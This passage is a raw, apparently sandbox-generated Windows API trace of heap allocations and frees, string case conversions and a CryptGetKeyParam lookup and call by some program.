lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0104.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0104.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0104.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.210] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0104.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0104.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0104.210] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0104.210] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0104.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0104.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcb31) returned 0x4516010 [0104.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2aa0 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0104.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ab0 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0104.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a30 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0104.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0104.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcb31) returned 0x452f690 [0104.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0104.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0104.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0104.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0104.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0104.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0104.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0104.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0104.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0104.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0104.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0104.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0104.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0104.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0104.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0104.213] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0104.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0104.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0104.263] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0104.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0104.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0104.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0104.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0104.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0104.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0104.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0104.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0104.264] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0104.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0104.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a70 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0104.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0104.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0104.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0104.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0104.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.266] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.266] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.266] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0104.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0104.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0104.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0104.269] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0104.269] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2af0, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2af0*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0104.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0104.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 